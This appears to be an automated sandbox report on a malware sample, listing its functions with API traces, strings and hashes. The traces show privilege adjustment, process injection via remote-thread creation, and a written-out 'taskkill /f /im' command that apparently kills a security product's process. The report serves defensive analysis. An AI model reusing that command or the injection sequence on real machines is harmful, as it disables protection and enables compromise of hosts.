Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: Section$CloseHandleOpenView
String ID:
API String ID: 2731707328-0
Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction ID: d6a2eb20d717170667e0730434efb86677d4db145f6e6a2ac42c7ae5f87b5801
Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
Instruction Fuzzy Hash: E521097030054BABDB24DE25CCA6FB9776AAF80744F40011CFA198E294DBB1AE14CA18

Function 006F1422 Relevance: 3.0, APIs: 2, Instructions: 38
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 006F145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 006F146A

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
Opcode Fuzzy Hash: 4d961b29825b6918877cf0b8ca3bbdf1a1a783037955428b050f6265267c3a26
Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4

Function 006F2477 Relevance: 3.0, APIs: 2, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 006F249B
NtWriteVirtualMemory.NTDLL ref: 006F24A4

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ProtectWrite
String ID:
API String ID: 151266762-0
Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A

Function 006F144A Relevance: 3.0, APIs: 2, Instructions: 22
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 006F145A
NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 006F146A

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: AdjustLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 3615134276-0
Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5

Function 0047619E Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce32db99ff61221dc63db72a842662bb1762c0249ad71179134b7609ba8ba76
Instruction ID: 7f4b830b71087d045bcc2c3395c932e405091f925b7f89d01d938c821fa498e2
Opcode Fuzzy Hash: dce32db99ff61221dc63db72a842662bb1762c0249ad71179134b7609ba8ba76
Instruction Fuzzy Hash: B901E5716049449BD290FA25C981AD9B767BF84318F22C24FE60C2B14BC779A542DA9A

Function 7FE35AC1 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2017052696.000000007FE30000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_hrl97BF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18debca8f2dd2d1ca2f8adb3937bfd968cff8255c5041bfcf825438cbb2dca55
Instruction ID: 3e2e8e4e75e5df89517f36b07e5cfbc1557ccc8b6e57ea1444096323934d4e27
Opcode Fuzzy Hash: 18debca8f2dd2d1ca2f8adb3937bfd968cff8255c5041bfcf825438cbb2dca55
Instruction Fuzzy Hash:

Function 004029E0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 88
windowprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#4710.MFC42 ref: 004029EA
SendMessageA.USER32(?,00000080,00000001,?), ref: 00402A04
SendMessageA.USER32(?,00000080,00000000,?), ref: 00402A15
SetWindowLongA.USER32(?,000000EC,00000080), ref: 00402A2A
#6197.MFC42(00000000,0000009C,0000009C,00000000,00000000,00000001), ref: 00402A3E
WinExec.KERNEL32(taskkill /f /im ZhuDongFangYu.exe /t,00000000), ref: 00402A5D

Part of subcall function 00402B40: LoadLibraryA.KERNEL32(kernel32.dll,00000047), ref: 00402BF5
Part of subcall function 00402B40: GetProcAddress.KERNEL32(00000000), ref: 00402BFC
Part of subcall function 00402B40: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00402C1F
Part of subcall function 00402B40: strncmp.MSVCRT ref: 00402C44

ExitProcess.KERNEL32 ref: 00402AC4

Strings

100200, xrefs: 00402A71, 00402AA7
100200, xrefs: 00402A9D
100200, xrefs: 00402AA2
|7@, xrefs: 00402A8E
taskkill /f /im ZhuDongFangYu.exe /t, xrefs: 00402A58

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: MessageSend$#4710#6197AddressDirectoryExecExitLibraryLoadLongProcProcessSystemWindowstrncmp
String ID: 100200$100200$100200$taskkill /f /im ZhuDongFangYu.exe /t$|7@
API String ID: 3614577793-2301931671
Opcode ID: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction ID: 36d68f4db7c25d412b264195875051be24fd626328578f2d4964cd317598fecc
Opcode Fuzzy Hash: e673e02340e5bd4efe8e554bec7010853af1fda679b9e67aa24c048e2f3451a8
Instruction Fuzzy Hash: 6E11B4307407107BD730AB659E0AF5B77A8BB44B04F10462EFA85B72C1CFF8A8048A5C

Function 006F07AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62
processthreadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006F144A: LookupPrivilegeValueA.ADVAPI32(00000000,?,?,00000001,00000000,00000000,00000002), ref: 006F145A
Part of subcall function 006F144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000001,00000000,00000000,00000002), ref: 006F146A

CloseHandle.KERNELBASE(?), ref: 006F05AD
FreeLibrary.KERNELBASE(76DA0000,?,006F079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F07B8
CloseHandle.KERNELBASE(?,?,006F079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F07BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F07C9
Process32First.KERNEL32 ref: 006F07DC
Process32Next.KERNEL32 ref: 006F07ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F0805
CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 006F0842
CloseHandle.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 006F085D
CloseHandle.KERNEL32 ref: 006F086C

Strings

csrs, xrefs: 006F082C

Memory Dump Source

Source File: 00000006.00000002.2016226259.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6f0000_hrl97BF.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 1058b10a0c64bb4be2cb67b5c3713657345469ac657fbaf3bf18296eefa2c298
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: F6113031501209FBFB256F25CD49BBF3A6EEF45751F10006CFE4A99142C6B49F019A6A

Function 004010B0 Relevance: 4.7, APIs: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1134.MFC42(00000000), ref: 004010D0

Part of subcall function 004011F0: #324.MFC42(00000066,00000000,?,?,00000000,00405C38,000000FF,004010ED,00000000), ref: 00401214
Part of subcall function 004011F0: #1168.MFC42(00000066,00000000,?,?,00000000), ref: 00401227
Part of subcall function 004011F0: #1146.MFC42(00000080,0000000E,00000080,00000066,00000000,?,?,00000000), ref: 00401238
Part of subcall function 004011F0: LoadIconA.USER32(00000000,00000080), ref: 0040123E

#2514.MFC42(00000000), ref: 004010FD
#641.MFC42(00000000), ref: 004011AA

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: #1134#1146#1168#2514#324#641IconLoad
String ID:
API String ID: 684539369-0
Opcode ID: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction ID: e887a676387cd3a6316cff733c1d11cddbc99e07af3dfecb023e529bfa9dd79e
Opcode Fuzzy Hash: d0dbdc0e91b82d1144f430ae13d057aa2d360b1f2b28aa11f9f2600f3695659b
Instruction Fuzzy Hash: 07F09671854618EBC724EFA4CC42B9DB778FB05724F10033EE815A36C1EB785605CB85

Function 00405B10 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#1576.MFC42(004035C3,004035C3,004035C3,004035C3,004035C3,00000000,?,0000000A), ref: 00405B20

Memory Dump Source

Source File: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015180018.0000000000430000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015213526.0000000000436000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015246635.0000000000437000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015280644.000000000043C000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015317535.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015349617.000000000043F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015382690.0000000000444000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015416441.0000000000445000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015458095.000000000044A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015494843.000000000044C000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015528471.0000000000452000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015562799.0000000000453000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015596431.0000000000458000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015635043.000000000045A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015668372.000000000045B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015702055.0000000000460000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015736897.0000000000461000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015772590.0000000000466000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015806142.0000000000468000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015842352.0000000000469000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015875687.000000000046E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015907050.000000000046F000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015944598.0000000000474000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015978096.0000000000476000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016014832.000000000047D000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hrl97BF.jbxd

Yara matches

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction ID: d2ca0a3b883f0518e56937479b7600124a2c67ba881e6fa747779e696d41ac8e
Opcode Fuzzy Hash: 47d5a98b55b57ba85a66e84109f2227387a3d22cae08d4c422bb556fe884a3cf
Instruction Fuzzy Hash: 36B0087601C786ABDB02DE91880192BBAA2BB98704F485C1DB2A1140A187768478EB16

Function 00482CAE Relevance: 1.3, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000004,CA1AE9E0,?,?,?,?,?,?,?,?,?,?,?,?,?,07704390), ref: 00482C82

Memory Dump Source

Source File: 00000006.00000002.2016049473.0000000000482000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2014725154.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014756449.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014788210.0000000000406000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014819168.0000000000408000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014850226.000000000040A000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014883689.0000000000411000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014914420.0000000000414000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014948163.000000000041A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2014980693.000000000041B000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015012838.0000000000420000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015046451.0000000000422000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015078963.0000000000428000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015111287.0000000000429000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.2015145266.000000000042E000.00000040.00000001.01000000.00000004.sdmpDownload File
